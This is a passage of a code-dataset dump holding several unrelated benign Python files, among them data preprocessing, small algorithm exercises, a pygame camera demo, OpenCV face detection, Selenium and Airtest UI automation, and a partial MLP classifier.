해석 가능한 파생 변수 생성\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [임대세대외]\n\ntrain_df['임대세대외'] = train_df['총세대수'] - train_df['세대수합']\ntest_df['임대세대외'] = test_df['총세대수'] - test_df['세대수합']\n\n# --------------------------------------->>> [실세대수]\n\ntrain_df['실세대수'] = train_df['총세대수'] - train_df['공가수']\ntest_df['실세대수'] = test_df['총세대수'] - test_df['공가수']\n\n# --------------------------------------->>> [임대세대 비율]\n\ntrain_df['임대세대비율'] = train_df['세대수합'] / train_df['총세대수']\ntest_df['임대세대비율'] = test_df['세대수합'] / test_df['총세대수']\n\n# --------------------------------------->>> [지하철 / 실세대수]\n\ntrain_df['subway_ratio'] = train_df['subway'] / train_df['실세대수']\ntest_df['subway_ratio'] = test_df['subway'] / test_df['실세대수']\n\n# --------------------------------------->>> [버스정류장 / 실세대수]\n\ntrain_df['bus_ratio'] = train_df['bus'] / train_df['실세대수']\ntest_df['bus_ratio'] = test_df['bus'] / test_df['실세대수']\n\n# --------------------------------------->>> [세대 당 주차면수]\n\ntrain_df['단위주차면수'] = train_df['단지내주차면수'] / train_df['실세대수']\ntest_df['단위주차면수'] = test_df['단지내주차면수'] / test_df['실세대수']\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 6. 인구정보 합치기\n# ----------------------------------------------------------------------------------------------------------------------\n\n# --------------------------------------->>> [컬럼명 변경]\n\nraw_age_gender_info.columns = list(map(lambda x : x.replace('(', '_').replace(')', ''),\n raw_age_gender_info.columns))\n\ntrain_df = pd.merge(train_df, raw_age_gender_info,\n on = '지역',\n how = 'left')\n\ntest_df = pd.merge(test_df, raw_age_gender_info,\n on = '지역',\n how = 'left')\n\ntrain_df.reset_index(drop = True, inplace = True)\ntest_df.reset_index(drop = True, inplace = True)\n\n\npickle.dump(train_df, open('data/train_df_2.sav', 'wb'))\npickle.dump(test_df, open('data/test_df_2.sav', 'wb'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mosyo0505/dacon_parking","sub_path":"code/preprocessing/001.preprocessing_1.py","file_name":"001.preprocessing_1.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35273792076","text":"# mogrt.py\n# v1.0\n# Builds Adobe Stock Mogrt Batches based on my personal file structure\n# workbench.tv\n\nimport os\nimport argparse\nimport textwrap\nimport glob\nimport pathlib\nimport shutil\nimport zipfile\n\n\nparser = argparse.ArgumentParser(\n formatter_class = argparse.RawTextHelpFormatter,\n description = 'Builds Adobe Stock Mogrt Batches based on my personal file structure')\nparser.add_argument('src_dir', help = 'source directory')\nargs = parser.parse_args()\n\nsrc_dir = args.src_dir\n\nname = os.path.basename(src_dir)\n\nmogrt = src_dir + '/' + name + '.mogrt'\nthumb = src_dir + '/Renders/Thumbnail.jpg'\npreview = src_dir + '/Renders/Preview.mp4'\n\nroot = \"/Volumes/Dropbox/Dropbox/Work/Clients/Adobe Stock/_MOGRTS/Batch Delivery\"\ndst = root + '/' + name\ntmp = \"/Volumes/Dropbox/Dropbox/Work/Clients/Adobe Stock/_MOGRTS/Batch Delivery Temp\"\n\n# Build Main folder\nos.mkdir(dst)\n\n# Build stock deliverable\nshutil.copyfile(mogrt, dst + '/' + name + '.mogrt')\nshutil.copyfile(preview, dst + '/' + name + '.mp4')\nshutil.copyfile(thumb, dst + '/Thumbnail.jpg')\n\ndeliverable = pathlib.Path(dst)\ndeliverable_zip = 
root + '/' + name + '.zip'\n\nwith zipfile.ZipFile(deliverable_zip, 'w') as zip:\n for file in deliverable.rglob('*'):\n file_path = str(file)\n zip.write(file, file_path[len(dst):len(file_path)])\n\nprint('--> Zipped Deliverable')\n\n# Clean Up\nshutil.rmtree(dst)\n\nprint('--> Cleaned up')\n","repo_name":"workbenchtv/mogrt","sub_path":"mogrt.py","file_name":"mogrt.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34297658329","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 4 2019\n\n@author: Nahuel\n\"\"\"\n# la variable veces especifica cada cuantas muestras se quiere hacer el promedio\ndef MediaMovil(vector, veces):\n prom = [];\n k = 0;\n iteraciones = len(vector) - veces + 1;\n for i in range(iteraciones):\n acum = 0;\n for j in range(k,k+veces):\n acum = acum + vector[j];\n prom.append(acum/veces);\n k = k+1;\n print(prom); \n\np1 = [11, 12, 13, 14, 15, 16, 17, 18];\nMediaMovil(p1,5)","repo_name":"Nj747/DSP_code_in_Python","sub_path":"Ejemplo1.py","file_name":"Ejemplo1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33867344411","text":"from typing import List, Dict\n\nidx_to_name: List[str] = []\nremaining_visits: List[int] = [] # 1 for lowercase, LARGEINT for uppercase\ngraph: List[List[int]] = [] # indexed by node: vector of nodes forming edges\n\n\ndef print_graph(graph: List[List[int]], idx_to_name: List[str]) -> None:\n for x, vec in enumerate(graph):\n for y in vec:\n print(f\"{idx_to_name[x]}-{idx_to_name[y]} ({x}-{y})\")\n\n\ndef print_path(path: List[int]):\n print(\",\".join([idx_to_name[x] for x in path]))\n\n\ndef calc_num_paths_part1(node: int) -> int:\n num_paths = 0\n if node == 1: # end node\n return 1\n if not remaining_visits[node]:\n return 0\n remaining_visits[node] -= 1\n for next_node in graph[node]:\n num_paths += calc_num_paths_part1(next_node)\n remaining_visits[node] += 1 # passed by reference / global, so roll-back\n return num_paths\n\n\ndef calc_num_paths_part2(node: int, path: List[int] = []) -> int:\n # Path is added in order to be able to print all paths\n num_paths = 0\n path = path + [node]\n if node == 1: # end node\n # print_path(path)\n return 1\n if not remaining_visits[node]:\n return 0\n # only one node can be visited twice.\n # So if at least one node got no remaining_visits, the rest are bounded by 1\n if remaining_visits[node] == 1 and any([x == 0 for x in remaining_visits]):\n return 0\n remaining_visits[node] -= 1\n for next_node in graph[node]:\n if next_node != 0: # not start node\n num_paths += calc_num_paths_part2(next_node, path)\n remaining_visits[node] += 1 # passed by reference / global, so roll-back\n return num_paths\n\n\nwith open(\"data.txt\") as f:\n node_names: Dict[str, int] = {}\n node_names[\"start\"] = 0\n\n def update_node(node: str) -> int:\n x = node_names.get(node, len(idx_to_name))\n node_names[node] = x\n assert x <= len(idx_to_name)\n if x == len(idx_to_name):\n idx_to_name.append(node)\n remaining_visits.append(1 if node[0].islower() else 1000000)\n return x\n\n update_node(\"start\")\n update_node(\"end\")\n graph = [[], []]\n for line in f:\n nodeA, nodeB = line.strip().split(\"-\")\n x = update_node(nodeA)\n y = update_node(nodeB)\n\n def update_edge(x: int, y: int) -> None:\n assert x <= len(graph)\n if x == len(graph):\n graph.append([y])\n else:\n if not y in graph[x]:\n 
graph[x].append(y)\n\n update_edge(x, y)\n update_edge(y, x)\n\n# print_graph(graph, idx_to_name)\nnum_paths = calc_num_paths_part1(0) # 0 = start node\nprint(\"Paths:\", num_paths)\n\n################################\n# PART 2\nprint(\"PART 2\")\nremaining_visits = [\n 2 if x == 1 else x for x in remaining_visits\n] # we now can have two visits for small caves\nremaining_visits[0] = 1000000 # start node\nnum_paths = calc_num_paths_part2(0, []) # 0 = start node\nprint(\"Paths:\", num_paths)\n","repo_name":"kobyv/AdventOfCode","sub_path":"2021/day12/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5094983195","text":"#wapp to find factorial of a given no.\n\nnum = int(input(\"Enter a number \"))\nif num < 0:\n\tprint(\"b +ve\")\nelse:\n\tfact = 1\n\tfor i in range(1,num+1):\n\t\tfact = fact*i\n\tprint(\"Fact= \",fact)\n","repo_name":"chicken-biryani/PythonPrograms","sub_path":"L2/prac9.py","file_name":"prac9.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34695958468","text":"#遍历字典键值对\r\nusr_0 = {\r\n '1':'maomao',\r\n '2':'taotao',\r\n '3':'sansan',\r\n}\r\n\r\nfor key , value in usr_0.items():\r\n print(\"\\nKey: \" + key)\r\n print(\"Value: \" + value)\r\n#遍历字典键\r\nfor name in usr_0.keys():\r\n print (\"\\n name: \" + name.title())\r\n#遍历字典值\r\nfor name in usr_0.values():\r\n print (\"\\n name: \" + name.title())","repo_name":"liumeiping6911/python_learning","sub_path":"Task3/1.字典/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43953152229","text":"# arm.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n# \n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains the Arm class\n\"\"\"\n\nfrom const import *\nfrom armLink import ArmLink\n\nclass Arm:\n def __init__(self, armBasePos, armLinkSpec):\n\n if len(armLinkSpec) > MAX_NUM_OF_ART_LINKS:\n print(\"Maximum number of arm links is %d\" % (MAX_NUM_OF_ART_LINKS))\n raise SystemExit\n\n self.__armLinks = []\n self.__armRelativeAngle = []\n self.__armLimit = []\n\n base = armBasePos\n totalRelativeAngle = 0\n for i in range(len(armLinkSpec)):\n length, relativeAngle, distance, limit = armLinkSpec[i]\n if relativeAngle < min(limit) or relativeAngle > max(limit):\n print(\"The given relativeAngle is not in available range. 
Set to minimum.\")\n relativeAngle = min(limit)\n self.__armLimit.append(limit)\n self.__armRelativeAngle.append(relativeAngle)\n totalRelativeAngle += relativeAngle\n armLink = ArmLink(base, length, totalRelativeAngle % 360, distance)\n self.__armLinks.append(armLink)\n base = armLink.getEnd() \n\n\n def getBase(self):\n \"\"\"This function returns (x, y) of the arm base\n \"\"\"\n return self.__armLinks[0].getBase()\n\n def getEnd(self):\n \"\"\"This function returns (x, y) of the arm tip\n \"\"\"\n return self.__armLinks[-1].getEnd()\n\n def getArmPos(self):\n \"\"\"This function returns (start, end) of all arm links\n For example, if there are two arm links, the return value would be '\n [ [(x1, y1), (x2, y2)], \n [(x2, y2), (x3, y3)] ]\n \"\"\"\n info = []\n for armLink in self.__armLinks:\n info.append((armLink.getBase(), armLink.getEnd()))\n return info\n \n def getArmPosDist(self):\n \"\"\"This function returns (start, end) of all arm links with the padding distance of the arm\n For example, if there are two arm links, the return value would be '\n [ [(x1, y1), (x2, y2), distance], \n [(x2, y2), (x3, y3), distance] ]\n \"\"\"\n info = [(armLink.getBase(), armLink.getEnd(), armLink.getDistance()) for armLink in self.__armLinks]\n return info\n\n def getArmAngle(self):\n \"\"\"This function returns relative angles of all arm links.\n If there are two arm links, the return value would be (alpha, beta) \n \"\"\"\n return self.__armRelativeAngle\n\n def getArmLimit(self): \n \"\"\"This function returns (min angle, max angle) of all arm links\n \"\"\"\n return self.__armLimit\n\n def getNumArmLinks(self):\n \"\"\"This function returns the number of arm links of this arm\n \"\"\"\n return len(self.__armLinks)\n\n def setArmAngle(self, angles): \n \"\"\"This function sets angles(alpha, beta, gamma) for all arm links\n \"\"\"\n angles = angles[:self.getNumArmLinks()]\n\n for i in range(len(angles)):\n if angles[i] < min(self.__armLimit[i]) or angles[i] > max(self.__armLimit[i]):\n return False\n\n self.__armRelativeAngle = angles\n totalAngle = 0\n base = self.getBase()\n for i in range(len(self.__armRelativeAngle)):\n totalAngle += self.__armRelativeAngle[i]\n self.__armLinks[i].setAngle(totalAngle % 360)\n self.__armLinks[i].setBase(base)\n base = self.__armLinks[i].getEnd()\n\n return True\n","repo_name":"adityavgupta/ECE448-CS440","sub_path":"mp2/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"1445801818","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\n\n\nfontsize = 13\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['Times New Roman']\nrcParams['font.size'] = fontsize\nrcParams['mathtext.fontset'] = 'stix'\nrcParams['axes.titlesize'] = fontsize\nrcParams['axes.labelsize'] = fontsize\nrcParams['text.usetex'] = True\nrcParams[\"savefig.dpi\"] = 150\n\nall_results_dir = Path('paper_plots/results')\nresults_subdirs = ['bc-gail-gan', 'bc-gail', 'bc-gan', 'rgb']\nresults_labels = {'bc-gail-gan': 'hGAIL', 'bc-gail': 'GAIL w/ real BEV', 'bc-gan': 'BC', 'rgb': 'GAIL from cam'} # \nresults_types = ['eval_episodes', 'eval_route_completed', 'rollout_episodes']\ncolumns_names = ['eval_town2/completed_n_episodes', 'eval_town2/is_route_completed', 'rollout/completed_n_episodes']\ncolumns_labels = {'eval_town2/completed_n_episodes': 'infractions', 
'eval_town2/is_route_completed': 'completed', 'rollout/completed_n_episodes': 'infractions'}\nfor result_type, column_name in zip(results_types, columns_names):\n for results_subdir in results_subdirs:\n print(results_subdir)\n print(result_type)\n results_len = 3\n if results_subdir == 'bc-gan' and not result_type in ['eval_episodes', 'eval_route_completed']:\n continue\n if results_subdir == 'rgb' and not result_type in ['rollout_episodes']:\n continue\n results_dfs = []\n for i_result in range(results_len):\n results_dir = all_results_dir / f'{results_subdir}-{i_result}'\n results_file = results_dir / f'{result_type}.csv'\n results_df = pd.read_csv(results_file)\n results_dfs.append(results_df)\n \n min_length = None\n for i_result in range(results_len):\n steps_list = results_dfs[i_result]['Step'].tolist()\n if min_length is None:\n min_length = len(steps_list)\n else:\n min_length = min(len(steps_list), min_length)\n print(min_length)\n \n results_lists = []\n for i_result in range(results_len):\n steps_list = results_dfs[i_result]['Step'] / 100000\n steps_list = steps_list\n steps_list = steps_list[:min_length]\n result_column = results_dfs[i_result][column_name].tolist()\n result_column = result_column[:min_length]\n results_lists.append(result_column)\n\n results_array = np.array(results_lists)\n results_mean = results_array.mean(axis=0)\n results_std = results_array.std(axis=0)\n plt.plot(steps_list, results_mean, label=results_labels[results_subdir])\n plt.fill_between(steps_list, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n plt.legend(loc='best', shadow=True, fontsize='medium')\n plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n plt.ylabel(columns_labels[column_name])\n plt.savefig(f'{result_type}.png')\n plt.clf()\n\n# results_0 = pd.read_csv(results_files[0])\n# results_1 = pd.read_csv(results_files[1])\n\n# min_size = 420\n# results_list = [results_0, results_1]\n# for results in results_list:\n# min_size = min(min_size, len(results))\n\n# results_arr_list = []\n# for results in results_list:\n# results_arr = results['Value'].to_numpy()\n# results_arr = results_arr[:min_size]\n# results_arr_list.append(results_arr)\n\n# results = np.array(results_arr_list)\n# # results = results.reshape(-1, 3)\n# results_mean = results.mean(axis=0)\n# results_std = results.std(axis=0)\n# results_id = np.arange(results.shape[1]) * 7200 /100000\n\n# plt.plot(results_id, results_mean, label=results_files[4])\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# results_mean.fill(173.6)\n# plt.plot(results_id, results_mean, label='bc')\n# results_std.fill(137.35516007780703)\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n# plt.ylabel('Reward')\n# plt.legend(loc='lower right', shadow=True, fontsize='medium')\n# plt.savefig('paper_plots/plots/long_train_reward.png')\n# plt.clf()\n\n# for results_files in results_dataset:\n# results_0 = pd.read_csv(results_files[2])\n# results_1 = pd.read_csv(results_files[3])\n\n# min_size = 420\n# results_list = [results_0, results_1]\n# for results in results_list:\n# min_size = min(min_size, len(results))\n\n# results_arr_list = []\n# for results in results_list:\n# results_arr = results['Value'].to_numpy()\n# results_arr = results_arr[:min_size]\n# results_arr_list.append(results_arr)\n\n# results = np.array(results_arr_list)\n# # results = results.reshape(-1, 
3)\n# results_mean = results.mean(axis=0)\n# results_std = results.std(axis=0)\n# results_id = np.arange(results.shape[1]) * 7200 /100000\n\n# plt.plot(results_id, results_mean, label=results_files[4])\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n# plt.ylabel('Reward')\n# plt.savefig('paper_plots/plots/long_eval_reward.png')","repo_name":"gustavokcouto/hgail","sub_path":"paper_plots/gen_graphs.py","file_name":"gen_graphs.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"32274275300","text":"\"\"\"\n给你一个整数数组 nums ,找到其中最长严格递增子序列的长度。\n输入:nums = [10,9,2,5,3,7,101,18]\n输出:4\n解释:最长递增子序列是 [2,3,7,101],因此长度为 4 。\n\"\"\"\n\"\"\"\n原l长的问题拆分为最后一个元素是否是最长严格递增子序列的\n\"\"\"\nnums=[99,100,101,102,3,4,5] #索引值-1即可\nn=len(nums)\ndp=[1]*(n+1)\ndp[0]=0\nfor i in range(1,n+1):\n for j in range(1,i):\n if nums[j-1]d[len],说明nums[j]可以直接加在所有原子序列后面,因此扩增d。\n而若 存在k st. d[k]a:\n return 0\n else:\n return 1\n if sorted_list[compare_index]==a or \\\n sorted_list[compare_index]>a and sorted_list[compare_index-1]a:\\\n return binary_search(sorted_list[:compare_index],a)\n else:\n return len_list//2+binary_search(sorted_list[compare_index:],a)\n\nif __name__=='__main__':\n d=[]\n for m in nums:\n index=binary_search(d,m)\n if index!=len(d):\n d[index]=m\n else:\n d.append(m)\n print(len(d))","repo_name":"habunnywy/leetcode","sub_path":"leetcode/动态规划_最长子序列.py","file_name":"动态规划_最长子序列.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12007018892","text":"import pygame, sys\nfrom random import randint\n\nclass Tree(pygame.sprite.Sprite):\n def __init__(self, pos, group):\n super().__init__(group)\n self.image = pygame.image.load(\"graphics/tree.png\").convert_alpha()\n self.rect = self.image.get_rect(topleft = pos)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos, group):\n super().__init__(group)\n self.image = pygame.image.load(\"graphics/player.png\").convert_alpha()\n self.rect = self.image.get_rect(center = pos)\n self.direction = pygame.math.Vector2()\n self.speed = 5\n\n def input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_UP]: self.direction.y = -1\n elif keys[pygame.K_DOWN]: self.direction.y = 1\n else: self.direction.y = 0\n\n if keys[pygame.K_RIGHT]: self.direction.x = 1\n elif keys[pygame.K_LEFT]: self.direction.x = -1\n else: self.direction.x = 0\n\n def update(self):\n self.input()\n self.rect.center += self.direction * self.speed\n\nclass CameraGroup(pygame.sprite.Group):\n def __init__(self):\n super().__init__()\n self.display_surface = pygame.display.get_surface() # get the screen\n self.ground_surf = pygame.image.load(\"graphics/ground.png\").convert_alpha()\n self.ground_rect = self.ground_surf.get_rect(topleft=(0, 0))\n\n def custom_draw(self):\n # ground\n self.display_surface.blit(self.ground_surf, self.ground_rect)\n\n # elements on the ground\n for sprite in sorted(self.sprites(), key = lambda sprite: sprite.rect.centery): # the player and all trees\n self.display_surface.blit(sprite.image, sprite.rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((1280, 720))\nclock = pygame.time.Clock()\n\n# setup\ncamera_group = CameraGroup()\nPlayer((640, 360), camera_group)\n\nfor i in range(20):\n random_x = randint(0, 1000)\n random_y = randint(0, 
1000)\n Tree((random_x, random_y), camera_group)\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill(\"#71ddee\")\n\n camera_group.update()\n camera_group.draw(screen)\n camera_group.custom_draw()\n\n pygame.display.update()\n clock.tick(60)\n\n\n","repo_name":"lendoo73/FreeCodeCamp","sub_path":"Pygame/Cameras_in_Pygame/y_sort_camera.py","file_name":"y_sort_camera.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2804679531","text":"# -*- coding: utf-8 -*-\nimport pickle\ntc = {}\nt = {}\nc = {}\nwith open('82.txt','r') as f,open('83.pickle','wb') as g:\n cnt = 0\n for line in f:\n word = tuple(line[:-1].split('\\t'))\n if word[0] in t.keys():\n t[word[0]] += 1\n else:\n t.update({word[0]:1})\n if word[1] in c.keys():\n c[word[1]] += 1\n else:\n c.update({word[1]:1})\n if word in tc.keys():\n tc[word] += 1\n else:\n tc.update({word:1})\n cnt += 1\n res = [cnt,tc,t,c]\n pickle.dump(res,g)\n\n","repo_name":"yryota/nlp100","sub_path":"chap9/nlp_83.py","file_name":"nlp_83.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20996019903","text":"import numpy as np\r\nimport cv2\r\n\r\ndir = \"Intro_OpenCV/tratamiento_imagenes/detector_objetos/\"\r\n# Cargamos el archivo xml del detector seleccionado\r\nface_classifier = cv2.CascadeClassifier(\r\n dir + \"Haarcascades/haarcascade_frontalface_default.xml\"\r\n)\r\neye_classifier = cv2.CascadeClassifier(dir + \"Haarcascades/haarcascade_eye.xml\")\r\n\r\n# Leemos la imagen\r\nimagen = cv2.imread(dir + \"3.jpg\")\r\n\r\n# Convertimos la imagen a escala de grises\r\ngray = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\r\n\r\n# El clasificador retorna el ROI de la cara detectada como un tupla de valores\r\n# Esta está compuesta por la coordenada superior izquierda y la inferior derecha\r\nfaces = face_classifier.detectMultiScale(gray, 1.3, 5)\r\n\r\n# Cuando no detecta caras o rostros, el clasificador returna una tupla vacía\r\nif faces is ():\r\n print(\"No se encontraron rostros\")\r\n\r\n# Se itera a través del array de rostros detectados y se dibuja\r\n# un rectángulo sobre cada una de ellas\r\nfor x, y, w, h in faces:\r\n cv2.rectangle(imagen, (x, y), (x + w, y + h), (127, 0, 255), 2)\r\n cv2.imshow(\"Deteccion de Rostros\", imagen)\r\n\r\n# Se itera a través del array de ojos detectados y se dibuja\r\n# un rectángulo sobre cada una de ellos\r\neyes = eye_classifier.detectMultiScale(gray)\r\nfor ex, ey, ew, eh in eyes:\r\n cv2.rectangle(imagen, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)\r\n cv2.imshow(\"Deteccion de Rostro y Ojos\", imagen)\r\n\r\n# Cuando no detecta ojos, el clasificador returna una tupla vacía\r\nif eyes is ():\r\n print(\"No se encontraron ojos\")\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"jcorredorc/ia-movil-robot-agro","sub_path":"Intro_OpenCV/tratamiento_imagenes/detector_objetos/3_DetectorRostroyOjos.py","file_name":"3_DetectorRostroyOjos.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13015540409","text":"import json\nfrom glob import glob\nfrom typing import List\n\nfiles = glob(\"ChineseLyrics/*json\")\n\ndocs = []\nfor file in files:\n with open(file, encoding=\"utf8\") as rf:\n data = json.load(rf)\n for doc in 
data:\n # 将歌词的文本列表转换成一个字符串\n doc[\"lyric2\"] = \"\\n\".join(doc[\"lyric\"])\n docs.extend(data)\n\nprint(len(docs)) # 102198 \n\ndef search(keyword: str, docs: List[dict]) -> List[dict]:\n ret = []\n\n for index, doc in enumerate(docs):\n lyric = doc[\"lyric2\"]\n # 统计歌词中关键词出现的次数\n count = lyric.count(keyword)\n if count > 1:\n ret.append({\n \"doc\": doc,\n \"index\": index,\n \"count\": count\n })\n return ret\n\nret = search(\"梦想\", docs)\n\nprint(len(ret)) # 2235\n\n# 通过歌词中关键字出现的次数排序\nret2 = sorted(ret, key=lambda x:x[\"count\"], reverse=True)\n\nprint(ret2[0])","repo_name":"youerning/blog","sub_path":"search_engine/search1.py","file_name":"search1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"85"} +{"seq_id":"31920432534","text":"from selenium import webdriver\n\nif __name__ == '__main__':\n\n # Chrome WebDriver 로 chrome.exe 실행\n browser = webdriver.Chrome('./chromedriver.exe')\n\n # 사이트 호출\n browser.implicitly_wait(10)\n browser.get(\"https://v4.map.naver.com\")\n\n # 안내메시지 끄기\n serachbutton = browser.find_element_by_xpath('//*[@id=\"dday_popup\"]/div[2]/button')\n serachbutton.click()\n\n # 검색창에 검색어 입력후 엔터\n serachstring = browser.find_element_by_id(\"search-input\")\n serachstring.send_keys('치킨')\n # serachstring.send_keys(Keys.RETURN)\n\n # 검색 버튼 클릭\n search_button = browser.find_element_by_css_selector(\"button.spm\")\n search_button.click()\n\n # 페이지 읽기\n # print(browser.page_source)\n\n # 드라이브 종료\n browser.quit()","repo_name":"ImDaeseong/Selenium_test","sub_path":"python/navermap.py","file_name":"navermap.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14716201352","text":"# -*- encoding=utf8 -*-\n__author__ = \"chenwt\"\nfrom dch_common import config\nfrom airtest.core.api import *\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\ntry:\n poco = AndroidUiautomationPoco(use_airtest_input=True, screenshot_each_action=False)\nexcept IndexError as e:\n with open(\"D:\\\\apache-tomcat-8.5.33\\\\webapps\\\\DCH_Report\\\\log.txt\",'r+') as f:\n f.truncate()\n f.close()\n print(\"可能未连接到设备,请检查是否连接:\",e)\n\nauto_setup(__file__)\n\nconfig.setup()\nstart_app(\"com.iris.dch.itask\")\nsleep(5)\ntxt1 = ''\ntry:\n txt1 = poco(\"com.iris.dch.itask:id/btn_login\").get_text()\nexcept BaseException as e:\n txt = ''\n print (u'未获取到元素:',e)\nif txt1 == '登录':\n poco(\"com.iris.dch.itask:id/et_login_user\").click()\n #text(\"auto_test\")\n text(config.get_dch_config('itask_username'))\n poco(\"com.iris.dch.itask:id/et_login_psw\").set_text(config.get_dch_config('itask_password'))\n #text(\"111111\")\n #不同手机要用set_text 和 text() 两个方法来实现,坑爹啊\n #text(config.login_pwd())\n keyevent(\"Enter\")\n poco(\"com.iris.dch.itask:id/btn_login\").click()\n sleep(3)\n txt2 = poco(text=\"时间\").get_text()\n assert_equal(txt2,'时间','登录成功')\n\nelse:\n poco(\"com.iris.dch.itask:id/im_circle\").click()\n poco(\"com.iris.dch.itask:id/tv_menu_tuichu\").click()\n poco(\"com.iris.dch.itask:id/et_login_user\").click()\n #text(\"auto_test\")\n text(config.get_dch_config('itask_username'))\n poco(\"com.iris.dch.itask:id/et_login_psw\").set_text(config.get_dch_config('itask_password'))\n #text(\"111111\")\n #text(config.login_pwd())\n keyevent(\"Enter\")\n poco(\"com.iris.dch.itask:id/btn_login\").click()\n sleep(3)\n txt2 = poco(text=\"时间\").get_text()\n 
assert_equal(txt2,'时间','登录成功')\n\n\n\n\n\n\n\n\n\n","repo_name":"shmily-cwt/DCH_ITASK","sub_path":"test_dch_login.air/test_dch_login.py","file_name":"test_dch_login.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"27739102078","text":"# mlp.py\n# -------------\n\n# mlp implementation\nimport util\nimport numpy as np\n\nPRINT = True\n\n\nclass MLPClassifier:\n \"\"\"\n mlp classifier\n \"\"\"\n\n def __init__(self, legalLabels, max_iterations):\n self.legalLabels = legalLabels\n self.type = \"mlp\"\n self.max_iterations = max_iterations\n\n def sigmoid(self, x, d):\n if (d == True):\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n tData = []\n vData = []\n tLabels = np.zeros((len(trainingLabels), 10))\n\n # Converting the training and validation data to the input format\n for i in range(len(trainingData)):\n sample = trainingData[i].items()\n if i < len(validationData):\n validation = validationData[i].items()\n\n temp1 = []\n temp2 = []\n tLabels[i][trainingLabels[i]] = 1\n for j in range(len(sample)):\n # Only appending the feature at that point\n # Number of features should be the same for all training samples\n temp1.append(sample[j][1])\n if i < len(validationData):\n temp2.append(validation[j][1])\n sample = np.asarray(temp1)\n sample = sample.flatten()\n tData.append(sample)\n if i < len(validationData):\n validation = np.asarray(temp2)\n validation = validation.flatten()\n vData.append(validation)\n tData = np.asarray(tData)\n\n k = 150\n # 150 works decent for digits\n features = len(tData[0])\n self.l0 = np.random.random((features, k)) - 0.5\n self.l1 = np.random.random((k, 10)) - 0.5\n wl0 = self.l0\n wl1 = self.l1\n learning = 0.02\n\n for iteration in range(self.max_iterations):\n print (\"Starting iteration \", iteration, \"...\")\n for i in range(len(trainingData)):\n # Forward propagation\n l0 = tData[i]\n l0 = l0.reshape(1, -1)\n\n l1 = self.sigmoid(np.dot(l0, wl0), False)\n l2 = self.sigmoid(np.dot(l1, wl1), False)\n # print l0.shape, l1.shape, l2.shape\n\n # Compute output error value\n # print \"Computing error values...\"\n output_error = np.subtract(tLabels[i], l2)\n delta2 = np.multiply(output_error, self.sigmoid(l2, True))\n # print output_error.shape, delta2.shape\n delta2 = delta2 * 